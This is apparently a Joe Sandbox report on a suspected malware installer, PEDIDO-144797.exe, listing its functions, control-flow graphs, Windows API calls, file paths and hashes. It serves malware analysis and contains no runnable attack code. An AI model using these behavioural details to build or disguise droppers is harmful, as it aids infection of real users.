                                                                                                                                          • Instruction Fuzzy Hash: 10129C75D0064AEFEB20CFA4C8806EEB7F4FB083D4F61452AE565E7198D774AA80DB50
                                                                                                                                          Function 00405ABE Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 148filestringCOMMON
                                                                                                                                          Download Yara Rule

                                                                                                                                          Control-flow Graph

                                                                                                                                          • Executed
                                                                                                                                          • Not Executed
                                                                                                                                          control_flow_graph 484 405abe-405ae4 call 405d89 487 405ae6-405af8 DeleteFileW 484->487 488 405afd-405b04 484->488 489 405c7a-405c7e 487->489 490 405b06-405b08 488->490 491 405b17-405b27 call 4063b0 488->491 493 405c28-405c2d 490->493 494 405b0e-405b11 490->494 497 405b36-405b37 call 405ccd 491->497 498 405b29-405b34 lstrcatW 491->498 493->489 496 405c2f-405c32 493->496 494->491 494->493 499 405c34-405c3a 496->499 500 405c3c-405c44 call 4066f3 496->500 501 405b3c-405b40 497->501 498->501 499->489 500->489 508 405c46-405c5a call 405c81 call 405a76 500->508 504 405b42-405b4a 501->504 505 405b4c-405b52 lstrcatW 501->505 504->505 507 405b57-405b73 lstrlenW FindFirstFileW 504->507 505->507 509 405b79-405b81 507->509 510 405c1d-405c21 507->510 526 405c72-405c75 call 405414 508->526 527 405c5c-405c5f 508->527 513 405ba1-405bb5 call 4063b0 509->513 514 405b83-405b8b 509->514 510->493 512 405c23 510->512 512->493 524 405bb7-405bbf 513->524 525 405bcc-405bd7 call 405a76 513->525 516 405c00-405c10 FindNextFileW 514->516 517 405b8d-405b95 514->517 516->509 520 405c16-405c17 FindClose 516->520 517->513 521 405b97-405b9f 517->521 520->510 521->513 521->516 524->516 529 405bc1-405bca call 405abe 524->529 537 405bf8-405bfb call 405414 525->537 538 405bd9-405bdc 525->538 526->489 527->499 528 405c61-405c70 call 405414 call 406176 527->528 528->489 529->516 537->516 540 405bf0-405bf6 538->540 541 405bde-405bee call 405414 call 406176 538->541 540->516 541->516
                                                                                                                                          APIs
                                                                                                                                          • DeleteFileW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\,77762EE0,00000000), ref: 00405AE7
                                                                                                                                          • lstrcatW.KERNEL32(00425730,\*.*,00425730,?,?,C:\Users\user\AppData\Local\Temp\,77762EE0,00000000), ref: 00405B2F
                                                                                                                                          • lstrcatW.KERNEL32(?,0040A014,?,00425730,?,?,C:\Users\user\AppData\Local\Temp\,77762EE0,00000000), ref: 00405B52
                                                                                                                                          • lstrlenW.KERNEL32(?,?,0040A014,?,00425730,?,?,C:\Users\user\AppData\Local\Temp\,77762EE0,00000000), ref: 00405B58
                                                                                                                                          • FindFirstFileW.KERNEL32(00425730,?,?,?,0040A014,?,00425730,?,?,C:\Users\user\AppData\Local\Temp\,77762EE0,00000000), ref: 00405B68
                                                                                                                                          • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405C08
                                                                                                                                          • FindClose.KERNEL32(00000000), ref: 00405C17
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.89700560823.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.89700488645.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700631140.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89701022741.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_PEDIDO-144797.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                                                                          • String ID: "C:\Users\user\Desktop\PEDIDO-144797.exe"$0WB$C:\Users\user\AppData\Local\Temp\$\*.*
                                                                                                                                          • API String ID: 2035342205-897507723
                                                                                                                                          • Opcode ID: 6a659da8d5721ce07b89c17eb76fa4599111a2d920b673130fc03b7c63125bad
                                                                                                                                          • Instruction ID: 07f17dd178ac6d8b62b8dc139a3c49ba2dacd8a3a96bf447fe2624e5f5ce8b98
                                                                                                                                          • Opcode Fuzzy Hash: 6a659da8d5721ce07b89c17eb76fa4599111a2d920b673130fc03b7c63125bad
                                                                                                                                          • Instruction Fuzzy Hash: 1741D030904A18A6DB21AB618D89FBF7678EF42719F50813BF801B11D1D77C5982DEAE
                                                                                                                                          Function 00406ABA Relevance: 5.4, APIs: 4, Instructions: 382COMMON
                                                                                                                                          Download Yara Rule

                                                                                                                                          Control-flow Graph

                                                                                                                                          • Executed
                                                                                                                                          • Not Executed
                                                                                                                                          control_flow_graph 842 406aba-406abf 843 406b30-406b4e 842->843 844 406ac1-406af0 842->844 845 407126-40713b 843->845 846 406af2-406af5 844->846 847 406af7-406afb 844->847 848 407155-40716b 845->848 849 40713d-407153 845->849 850 406b07-406b0a 846->850 851 406b03 847->851 852 406afd-406b01 847->852 855 40716e-407175 848->855 849->855 853 406b28-406b2b 850->853 854 406b0c-406b15 850->854 851->850 852->850 858 406cfd-406d1b 853->858 856 406b17 854->856 857 406b1a-406b26 854->857 859 407177-40717b 855->859 860 40719c-4071a8 855->860 856->857 862 406b90-406bbe 857->862 865 406d33-406d45 858->865 866 406d1d-406d31 858->866 863 407181-407199 859->863 864 40732a-407334 859->864 869 40693e-406947 860->869 870 406bc0-406bd8 862->870 871 406bda-406bf4 862->871 863->860 867 407340-407353 864->867 868 406d48-406d52 865->868 866->868 877 407358-40735c 867->877 872 406d54 868->872 873 406cf5-406cfb 868->873 874 407355 869->874 875 40694d 869->875 876 406bf7-406c01 870->876 871->876 878 406cd0-406cd4 872->878 879 406e65-406e72 872->879 873->858 880 406c99-406ca3 873->880 874->877 881 406954-406958 875->881 882 406a94-406ab5 875->882 883 4069f9-4069fd 875->883 884 406a69-406a6d 875->884 885 406c07 876->885 886 406b78-406b7e 876->886 897 406cda-406cf2 878->897 898 4072dc-4072e6 878->898 879->869 890 406ec1-406ed0 879->890 893 4072e8-4072f2 880->893 894 406ca9-406ccb 880->894 881->867 899 40695e-40696b 881->899 882->845 891 406a03-406a1c 883->891 892 4072a9-4072b3 883->892 888 406a73-406a87 884->888 889 4072b8-4072c2 884->889 901 4072c4-4072ce 885->901 902 406b5d-406b75 885->902 895 406c31-406c37 886->895 896 406b84-406b8a 886->896 900 406a8a-406a92 888->900 889->867 890->845 906 406a1f-406a23 891->906 892->867 893->867 894->879 903 406c95 895->903 905 406c39-406c57 895->905 896->862 896->903 897->873 898->867 899->874 904 406971-4069b7 899->904 900->882 900->884 901->867 902->886 903->880 907 4069b9-4069bd 904->907 908 4069df-4069e1 904->908 909 406c59-406c6d 905->909 910 406c6f-406c81 905->910 906->883 911 406a25-406a2b 906->911 912 4069c8-4069d6 GlobalAlloc 907->912 913 4069bf-4069c2 GlobalFree 907->913 915 4069e3-4069ed 908->915 916 4069ef-4069f7 908->916 914 406c84-406c8e 909->914 910->914 917 406a55-406a67 911->917 918 406a2d-406a34 911->918 912->874 919 4069dc 912->919 913->912 914->895 920 406c90 914->920 915->915 915->916 916->906 917->900 921 406a36-406a39 GlobalFree 918->921 922 406a3f-406a4f GlobalAlloc 918->922 919->908 924 4072d0-4072da 920->924 925 406c16-406c2e 920->925 921->922 922->874 922->917 924->867 925->895
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.89700560823.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.89700488645.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700631140.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89701022741.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_PEDIDO-144797.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 3c070ca994c387dc491d90c6da3338e95d076c4c889754936ff9c01511acbaf1
                                                                                                                                          • Instruction ID: 906bff5cfe4bf8fc25f5c52b70697fc94252e662920e9b50785524ea690ef068
                                                                                                                                          • Opcode Fuzzy Hash: 3c070ca994c387dc491d90c6da3338e95d076c4c889754936ff9c01511acbaf1
                                                                                                                                          • Instruction Fuzzy Hash: EBF17870D04229CBDF18CFA8C8946ADBBB1FF44305F15816ED856BB281D7386A86DF45
                                                                                                                                          Function 004066F3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14fileCOMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          APIs
                                                                                                                                          • FindFirstFileW.KERNELBASE(?,00426778,00425F30,00405DD2,00425F30,00425F30,00000000,00425F30,00425F30,?,?,77762EE0,00405ADE,?,C:\Users\user\AppData\Local\Temp\,77762EE0), ref: 004066FE
                                                                                                                                          • FindClose.KERNELBASE(00000000), ref: 0040670A
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.89700560823.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.89700488645.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700631140.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89701022741.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_PEDIDO-144797.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: Find$CloseFileFirst
                                                                                                                                          • String ID: xgB
                                                                                                                                          • API String ID: 2295610775-399326502
                                                                                                                                          • Opcode ID: 8f8798618dbeb96281b7e152f222c6bef4cfc1fb78c0b92afc6d3f182eb863fd
                                                                                                                                          • Instruction ID: 551d457f2096baf6d1028c2489454c6ec1272a262abf728b5c7319079dd029a3
                                                                                                                                          • Opcode Fuzzy Hash: 8f8798618dbeb96281b7e152f222c6bef4cfc1fb78c0b92afc6d3f182eb863fd
                                                                                                                                          • Instruction Fuzzy Hash: DBD012315090209BC201173CBE4C85B7A989F953397128B37B466F71E0C7348C638AE8
                                                                                                                                          Function 00403ABE Relevance: 47.5, APIs: 13, Strings: 14, Instructions: 215stringregistryCOMMON
                                                                                                                                          Download Yara Rule

                                                                                                                                          Control-flow Graph

                                                                                                                                          • Executed
                                                                                                                                          • Not Executed
                                                                                                                                          control_flow_graph 139 403abe-403ad6 call 40678a 142 403ad8-403ae8 call 4062f7 139->142 143 403aea-403b21 call 40627e 139->143 151 403b44-403b6d call 403d94 call 405d89 142->151 147 403b23-403b34 call 40627e 143->147 148 403b39-403b3f lstrcatW 143->148 147->148 148->151 157 403b73-403b78 151->157 158 403bff-403c07 call 405d89 151->158 157->158 159 403b7e-403ba6 call 40627e 157->159 163 403c15-403c3a LoadImageW 158->163 164 403c09-403c10 call 4063d2 158->164 159->158 169 403ba8-403bac 159->169 167 403cbb-403cc3 call 40140b 163->167 168 403c3c-403c6c RegisterClassW 163->168 164->163 182 403cc5-403cc8 167->182 183 403ccd-403cd8 call 403d94 167->183 172 403c72-403cb6 SystemParametersInfoW CreateWindowExW 168->172 173 403d8a 168->173 170 403bbe-403bca lstrlenW 169->170 171 403bae-403bbb call 405cae 169->171 177 403bf2-403bfa call 405c81 call 4063b0 170->177 178 403bcc-403bda lstrcmpiW 170->178 171->170 172->167 176 403d8c-403d93 173->176 177->158 178->177 181 403bdc-403be6 GetFileAttributesW 178->181 185 403be8-403bea 181->185 186 403bec-403bed call 405ccd 181->186 182->176 192 403d61-403d69 call 4054e7 183->192 193 403cde-403cf8 ShowWindow call 40671a 183->193 185->177 185->186 186->177 198 403d83-403d85 call 40140b 192->198 199 403d6b-403d71 192->199 200 403d04-403d16 GetClassInfoW 193->200 201 403cfa-403cff call 40671a 193->201 198->173 199->182 206 403d77-403d7e call 40140b 199->206 204 403d18-403d28 GetClassInfoW RegisterClassW 200->204 205 403d2e-403d5f DialogBoxParamW call 40140b call 403a0e 200->205 201->200 204->205 205->176 206->182
                                                                                                                                          APIs
                                                                                                                                            • Part of subcall function 0040678A: GetModuleHandleA.KERNEL32(?,00000020,?,004034FB,0000000A), ref: 0040679C
                                                                                                                                            • Part of subcall function 0040678A: GetProcAddress.KERNEL32(00000000,?), ref: 004067B7
                                                                                                                                          • lstrcatW.KERNEL32(1033,00423728,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423728,00000000,00000002,C:\Users\user\AppData\Local\Temp\,77763420,"C:\Users\user\Desktop\PEDIDO-144797.exe",00000000), ref: 00403B3F
                                                                                                                                          • lstrlenW.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Eddadigtet,1033,00423728,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423728,00000000,00000002,C:\Users\user\AppData\Local\Temp\), ref: 00403BBF
                                                                                                                                          • lstrcmpiW.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Eddadigtet,1033,00423728,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423728,00000000), ref: 00403BD2
                                                                                                                                          • GetFileAttributesW.KERNEL32(Call), ref: 00403BDD
                                                                                                                                          • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Eddadigtet), ref: 00403C26
                                                                                                                                            • Part of subcall function 004062F7: wsprintfW.USER32 ref: 00406304
                                                                                                                                          • RegisterClassW.USER32(004291E0), ref: 00403C63
                                                                                                                                          • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403C7B
                                                                                                                                          • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403CB0
                                                                                                                                          • ShowWindow.USER32(00000005,00000000), ref: 00403CE6
                                                                                                                                          • GetClassInfoW.USER32(00000000,RichEdit20W,004291E0), ref: 00403D12
                                                                                                                                          • GetClassInfoW.USER32(00000000,RichEdit,004291E0), ref: 00403D1F
                                                                                                                                          • RegisterClassW.USER32(004291E0), ref: 00403D28
                                                                                                                                          • DialogBoxParamW.USER32(?,00000000,00403E6C,00000000), ref: 00403D47
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.89700560823.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.89700488645.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700631140.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89701022741.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_PEDIDO-144797.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                                                                                          • String ID: "C:\Users\user\Desktop\PEDIDO-144797.exe"$(7B$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Eddadigtet$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                                                                                                          • API String ID: 1975747703-2905262321
                                                                                                                                          • Opcode ID: ee5fd85ec343bc094daa65e3c13ef1cff60d12f5a08356af1ceed260609d9923
                                                                                                                                          • Instruction ID: afe91a4761cf59ebc4b7da6c1f2e4a45d87dcf75ce704844472433b73fc63153
                                                                                                                                          • Opcode Fuzzy Hash: ee5fd85ec343bc094daa65e3c13ef1cff60d12f5a08356af1ceed260609d9923
                                                                                                                                          • Instruction Fuzzy Hash: 81619370200601BED720AF669D46E2B3A7CEB84B49F40447FFD45B62E2DB7D9912862D
                                                                                                                                          Function 00402F14 Relevance: 26.5, APIs: 5, Strings: 10, Instructions: 203memoryCOMMON
                                                                                                                                          Download Yara Rule

                                                                                                                                          Control-flow Graph

                                                                                                                                          • Executed
                                                                                                                                          • Not Executed
                                                                                                                                          control_flow_graph 213 402f14-402f62 GetTickCount GetModuleFileNameW call 405ea2 216 402f64-402f69 213->216 217 402f6e-402f9c call 4063b0 call 405ccd call 4063b0 GetFileSize 213->217 218 4031b3-4031b7 216->218 225 402fa2-402fb9 217->225 226 40308c-40309a call 402e72 217->226 228 402fbb 225->228 229 402fbd-402fca call 40342b 225->229 233 4030a0-4030a3 226->233 234 40316b-403170 226->234 228->229 235 402fd0-402fd6 229->235 236 403127-40312f call 402e72 229->236 237 4030a5-4030bd call 403441 call 40342b 233->237 238 4030cf-40311b GlobalAlloc call 4068eb call 405ed1 CreateFileW 233->238 234->218 239 403056-40305a 235->239 240 402fd8-402ff0 call 405e5d 235->240 236->234 237->234 261 4030c3-4030c9 237->261 264 403131-403161 call 403441 call 4031ba 238->264 265 40311d-403122 238->265 244 403063-403069 239->244 245 40305c-403062 call 402e72 239->245 240->244 259 402ff2-402ff9 240->259 251 40306b-403079 call 40687d 244->251 252 40307c-403086 244->252 245->244 251->252 252->225 252->226 259->244 263 402ffb-403002 259->263 261->234 261->238 263->244 266 403004-40300b 263->266 273 403166-403169 264->273 265->218 266->244 268 40300d-403014 266->268 268->244 270 403016-403036 268->270 270->234 272 40303c-403040 270->272 275 403042-403046 272->275 276 403048-403050 272->276 273->234 274 403172-403183 273->274 277 403185 274->277 278 40318b-403190 274->278 275->226 275->276 276->244 279 403052-403054 276->279 277->278 280 403191-403197 278->280 279->244 280->280 281 403199-4031b1 call 405e5d 280->281 281->218
                                                                                                                                          APIs
                                                                                                                                          • GetTickCount.KERNEL32 ref: 00402F28
                                                                                                                                          • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\PEDIDO-144797.exe,00000400), ref: 00402F44
                                                                                                                                            • Part of subcall function 00405EA2: GetFileAttributesW.KERNELBASE(00000003,00402F57,C:\Users\user\Desktop\PEDIDO-144797.exe,80000000,00000003), ref: 00405EA6
                                                                                                                                            • Part of subcall function 00405EA2: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405EC8
                                                                                                                                          • GetFileSize.KERNEL32(00000000,00000000,00439000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\PEDIDO-144797.exe,C:\Users\user\Desktop\PEDIDO-144797.exe,80000000,00000003), ref: 00402F8D
                                                                                                                                          • GlobalAlloc.KERNELBASE(00000040,0040A230), ref: 004030D4
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.89700560823.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.89700488645.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700631140.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89701022741.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_PEDIDO-144797.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                                                                                                          • String ID: "C:\Users\user\Desktop\PEDIDO-144797.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\PEDIDO-144797.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                                                                                                          • API String ID: 2803837635-2771451183
                                                                                                                                          • Opcode ID: 4aa3185e2732ea1d92bd2938039fdcb50ab67e449d873de13479ee0b69e06266
                                                                                                                                          • Instruction ID: 409c8f22eebac3ceeba7cf51205c68f93d68dba00e9ec32c8e3ebc1c19b8881b
                                                                                                                                          • Opcode Fuzzy Hash: 4aa3185e2732ea1d92bd2938039fdcb50ab67e449d873de13479ee0b69e06266
                                                                                                                                          • Instruction Fuzzy Hash: 8D61E031A00204ABDB20EF65DD85A9A7BA8EB04355F20817FF901F72D0C77C9A418BAD
                                                                                                                                          Function 004063D2 Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 209stringCOMMON
                                                                                                                                          Download Yara Rule

                                                                                                                                          Control-flow Graph

                                                                                                                                          • Executed
                                                                                                                                          • Not Executed
                                                                                                                                          control_flow_graph 548 4063d2-4063dd 549 4063f0-406406 548->549 550 4063df-4063ee 548->550 551 40640c-406419 549->551 552 40661e-406624 549->552 550->549 551->552 555 40641f-406426 551->555 553 40662a-406635 552->553 554 40642b-406438 552->554 557 406640-406641 553->557 558 406637-40663b call 4063b0 553->558 554->553 556 40643e-40644a 554->556 555->552 559 406450-40648e 556->559 560 40660b 556->560 558->557 562 406494-40649f 559->562 563 4065ae-4065b2 559->563 564 406619-40661c 560->564 565 40660d-406617 560->565 566 4064a1-4064a6 562->566 567 4064b8 562->567 568 4065b4-4065ba 563->568 569 4065e5-4065e9 563->569 564->552 565->552 566->567 572 4064a8-4064ab 566->572 575 4064bf-4064c6 567->575 573 4065ca-4065d6 call 4063b0 568->573 574 4065bc-4065c8 call 4062f7 568->574 570 4065f8-406609 lstrlenW 569->570 571 4065eb-4065f3 call 4063d2 569->571 570->552 571->570 572->567 577 4064ad-4064b0 572->577 586 4065db-4065e1 573->586 574->586 579 4064c8-4064ca 575->579 580 4064cb-4064cd 575->580 577->567 582 4064b2-4064b6 577->582 579->580 584 406508-40650b 580->584 585 4064cf-4064f6 call 40627e 580->585 582->575 587 40651b-40651e 584->587 588 40650d-406519 GetSystemDirectoryW 584->588 599 406596-406599 585->599 600 4064fc-406503 call 4063d2 585->600 586->570 590 4065e3 586->590 592 406520-40652e GetWindowsDirectoryW 587->592 593 406589-40658b 587->593 591 40658d-406591 588->591 595 4065a6-4065ac call 406644 590->595 591->595 596 406593 591->596 592->593 593->591 598 406530-40653a 593->598 595->570 596->599 604 406554-40656a SHGetSpecialFolderLocation 598->604 605 40653c-40653f 598->605 599->595 602 40659b-4065a1 lstrcatW 599->602 600->591 602->595 608 406585 604->608 609 40656c-406583 SHGetPathFromIDListW CoTaskMemFree 604->609 605->604 607 406541-406548 605->607 610 406550-406552 607->610 608->593 609->591 609->608 610->591 610->604
                                                                                                                                          APIs
                                                                                                                                          • GetSystemDirectoryW.KERNEL32(Call,00000400), ref: 00406513
                                                                                                                                          • GetWindowsDirectoryW.KERNEL32(Call,00000400,00000000,00422708,?,0040544B,00422708,00000000), ref: 00406526
                                                                                                                                          • SHGetSpecialFolderLocation.SHELL32(0040544B,00000000,00000000,00422708,?,0040544B,00422708,00000000), ref: 00406562
                                                                                                                                          • SHGetPathFromIDListW.SHELL32(00000000,Call), ref: 00406570
                                                                                                                                          • CoTaskMemFree.OLE32(00000000), ref: 0040657B
                                                                                                                                          • lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 004065A1
                                                                                                                                          • lstrlenW.KERNEL32(Call,00000000,00422708,?,0040544B,00422708,00000000), ref: 004065F9
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.89700560823.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.89700488645.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700631140.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89701022741.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_PEDIDO-144797.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
